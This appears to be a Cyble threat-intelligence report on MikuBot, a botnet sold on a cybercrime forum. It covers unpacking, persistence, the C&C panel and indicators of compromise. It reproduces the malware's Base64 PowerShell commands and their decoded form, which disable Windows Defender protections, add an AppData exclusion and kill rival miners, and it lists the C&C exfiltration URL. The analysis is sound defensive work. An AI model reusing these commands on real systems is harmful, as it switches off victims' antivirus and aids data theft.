Cyble-Mikubot

MikuBot Spotted In The Wild

New Botnet Spies on Victims Using Hidden VNC

During a routine threat-hunting exercise, Cyble Research Labs came across a new malware bot named “MikuBot” in a cyber-crime forum. Mikubot is a malicious bot that steals sensitive data and launches hidden VNC sessions that allow the TA (Threat Actor) to access the victim’s machine remotely, spread through USB, and download and execute other malware.

The bot is written in C++ and works on operating systems ranging from Windows Vista to Windows 11. According to the TA’s post, the malware is standalone and does not require any dependencies to run. Additionally, the TA provides full software support, consultation, new features, crypts, and responsive administration for MikuBot.

The TA has also mentioned in the post that the malware uses encrypted strings, dynamic API functions, unique object names, anti-emulation methods, and tricks to evade detection by antivirus products.

The figure below shows the TA’s MikuBot advertisement on a cybercrime forum with price and feature details.

Figure 1 – Advertisement used by TA

The TA sells MikuBot with Panel for these (temporary) prices, as listed below:

  • $ 1300 (1.5 months)
  • $ 2200 (3 months)

The TA has claimed that the bot and panel have the following features in their post.

Figure 2 – MikuBot and C&C Panel features

Technical Details

We have taken the below sample hash for our analysis:

 (SHA256), 9d98af7edc7ef9cc5dfc258f11b1795b3ecb74aa613cc14212102d75bbdc8c44,

which is a 32-bit executable file compiled with Microsoft Visual C/C++ compiler.

Figure 3 – Static File Information

The malware file contains the encrypted payload embedded in the RCData of the resource section. Upon execution, the malware file loads the encrypted payload from the resource section and decrypts it.

The below figure shows the UPX packed payload decrypted from resource “RCData”.

Figure 4 – Encrypted payload in the “Resource” section of RCData

Then, the malware loads the UPX payload and executes it in the memory, as shown below.

Figure 5 – UPX-packed payload loaded in memory

Then, the malware unpacks the code in memory and creates a mutex named “CBB536F139732610633691” to ensure that only one instance of malware is running on the victim’s system at any given time.

Figure 6 – Mutex Creation

Next, the malware creates a folder with mutex name in %appdata% location, copies itself using the same name inside the folder, and hides both, as shown below.

Figure 7 – Hidden folder & Self-copy file

After that, it creates a task-scheduler entry with this mutex name, which executes the malware every 10 minutes.

Figure 8 – Task Scheduler entry

Additionally, the malware drops an internet shortcut file inside the start-up folder to establish auto-launch capability during system restarts.

Figure 9 – Auto-Start entry

Upon executing the self-copy file, it launches two PowerShell instances by using the ShellExecuteW() API function with the following Base64 encoded commands.

  • powershell.exe -exec bypass -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQBuAGEAYgBsAGUAQwBvAG4AdAByAG8AbABsAGUAZABGAG8AbABkAGUAcgBBAGMAYwBlAHMAcwAgAEQAaQBzAGEAYgBsAGUAZAANAAoAUwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0AUABVAEEAUAByAG8AdABlAGMAdABpAG8AbgAgAGQAaQBzAGEAYgBsAGUADQAKAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAAiACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwAiAA==”
  • powershell -Enc KABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAAVwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcwAgAC0AZgBpAGwAdABlAHIAIAAiAEMAbwBtAG0AYQBuAGQATABpAG4AZQAgAGwAaQBrAGUAIAAnACUAZABvAG4AYQB0AGUALQBsAGUAdgBlAGwAJQAnACIAKQAuAFQAZQByAG0AaQBuAGEAdABlACgAKQAKACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAIAAtAGYAaQBsAHQAZQByACAAIgBDAG8AbQBtAGEAbgBkAEwAaQBuAGUAIABsAGkAawBlACAAJwAlAGMAdQBkAGEAJQAnACIAKQAuAFQAZQByAG0AaQBuAGEAdABlACgAKQA=”

The first PowerShell instance executes the following commands to disable the Windows Defender’s controlled folder access and potentially unwanted application protection.

Additionally, it adds the %appdata% folder path into Windows Defender’s exclusion list.

  • Set-MpPreference -EnableControlledFolderAccess Disabled
  • Set-MpPreference -PUAProtection disable
  • Add-MpPreference -ExclusionPath “$env:userprofile\AppData\Roaming”

The second PowerShell instance runs the below WMI queries, which terminates the competitors’ miners and bots by checking the strings such as “donate-level” and “cuda” in the command line parameters of the running processes.

  • (Get-WmiObject Win32_Process -filter “CommandLine like ‘%donate-level%'”).Terminate()
  • (Get-WmiObject Win32_Process -filter “CommandLine like ‘%cuda%'”).Terminate()

The malware then tries to detect the presence of a virtual environment, debugger and antivirus tools by using strings and DLL modules.

Figure 10 – Anti-analysis Strings

Finally, the malware collects the victim’s sensitive information and sends it to the C&C server by using the below URL:

  • 136.144.41[.]244/panel/gate.php?CBB536F13973261063369

The below figure shows the code snippet used by the malware for sending the stolen information to its C&C server.

Figure 11 – Code snippet of C&C connection

The Bot can also perform additional tasks such as spreading via USB, downloading/executing other malware, and launching a Hidden Virtual Network Computing (HVNC) session with the ability to bypass NAT and update/remove the bot from the victim’s machine.

C&C Panel: MIKUBOT

Here are some screenshots that showcase the control panel of MikuBot.

The login page of MikuBot is shown below.

Figure 12 – C&C Panel Login Page

The figure below shows the home page of the MikuBot panel, which demonstrates the bot’s status and operating system along with the region.

Figure 13 – C&C Panel Homepage with status and region

The bot menu shows the list of bots that are connected to the C&C server along with the details such as status, UID, IP, country, Windows version, and first/last seen date, as shown below.

Figure 14 – Bot List in C&C Panel

The figure below shows the Tasks menu where TA can create a new HNVC task using details such as Bot ID, country code, and IP.

Figure 15 – Create tasks in C&C Panel

The below figure shows the convenient settings panel, which allows the TA to change the login and database credentials, modify the timeout, etc.

Figure 16 – C&C Panel Settings

Conclusion

Many cybercriminals purchase malware and add-on services from underground forums to carry out financial fraud without requiring a specific skill set. The sale of malware bots and services has placed individuals and entities at a greater risk of cyber-attacks and financial fraud.

The TAs behind MikuBot are highly active with limited functionalities at the moment. However, they are evolving their methods, and we can expect to see more sophisticated variants of MikuBot in the future. Cyble Research Labs will continue to monitor MikuBot developments and keep our readers aware and informed.

Our Recommendations

  • Avoid downloading files from untrusted sources.
  • Clear browsing history and reset passwords at regular intervals.  
  • Turn on the automatic software update feature on your computer, mobile, and other connected devices. 
  • Use a reputed anti-virus and internet security software package on your connected devices, including PC, laptop, and mobile. 
  • Refrain from opening untrusted links and email attachments without first verifying their authenticity.  
  • Educate employees in terms of protecting themselves from threats like phishing’s/untrusted URLs. 
  • Block URLs that could be used to spread the malware, e.g., Torrent/Warez. 
  • Monitor the beacon on the network level to block data exfiltration by malware or TAs. 
  • Enable Data Loss Prevention (DLP) Solution on the employees’ systems. 

MITRE ATT&CK® Techniques

TacticTechnique IDTechnique Name
ExecutionT1204
T1059
User Execution
Command and Scripting Interpreter
Defense EvasionT1497
T1027
Virtualization/Sandbox Evasion
Software Packing
PersistenceT1053
T1547
Scheduled Task/Job
Registry Run Keys / Startup Folder
DiscoveryT1082System Information Discovery
CollectionT1005Data from Local System
CNCT1071Application Layer Protocol

Indicator Of Compromise (IOCs)

IndicatorsIndicator
Type
Description
eab9c8aeeed4be3d8802ad9849fe6b93
a1d352239f3c2b005c3ea0736eecedea5db92821
9d98af7edc7ef9cc5dfc258f11b1795b3ecb74aa613cc14212102d75bbdc8c44
MD5
SHA1
Sha256
MikuBot exe
ca9aa4c6fde16d57e94b119cc399a668
2a013d2c21b9157025653add9310ec44257e6499
5afcf2affa6b7fd9018724b0d0547ebf3151b004c2daaf4aa5149d589bb4dff7
MD5
SHA1
Sha256
MikuBot exe
7fec36c6ceba69525848b9eaaf85307f
199f6c1b8effdd087c0f7ac85b4fee976826de7c
73865a87ccbba39258ac07f9e0606df31aebc510aa2e7b437fc8a9fcdd1d55a3
MD5
SHA1
Sha256
MikuBot exe
c51f9796867da3ff980535a0e2516bec
681317aff2fc33e23bcc42c1eac3e2c4e69691cd
8aab180f8a8ad2351ab4e93c09e84cf27b3b7f0ebfdf34fbe341c2ab8a99a16a
MD5
SHA1
Sha256
MikuBot exe
c20b29f54755d2bc04e44baa800b9a7d
0dcda234dd568a4080322ed10a36b5c0af8a8827
d2221c20900d9aebbd0d19bf17ad41483e7453ad190d07b4f6d5b9dc213d3224
MD5
SHA1
Sha256
MikuBot exe
4007430207efa37a386e74a669d210c7
1c717bfb62106470c06969daf3d2fe697cbd88f7
5416d7c012d4a0cfb50d068e9660be9724fa128c175b018f14a4f05c1e3b7b64
MD5
SHA1
Sha256
MikuBot exe
5aedea35488b7786fe31b7e8ba029a76
c2601dee06e586cfac8e7a48ab69aa76f421af19
6a540c56ddd2715f68bb87455cc894ec5d314d4dca97013e83d7fd9fc47302b8
MD5
SHA1
Sha256
MikuBot exe
0764d1b4ecdba14cc700dfa5c3aa0058
73ee1688ca98002c2fc90d6ef1b41e675c5bcb22
39728194d4c182d2e158686ba4c402f5d46c3dabe9538a09ff8dd2bc481ecc88
MD5
SHA1
Sha256
MikuBot UPX packed exe
136.144.41[.]244/panel/gate.php?CBB536F139732610633691URLC&C
Scroll to Top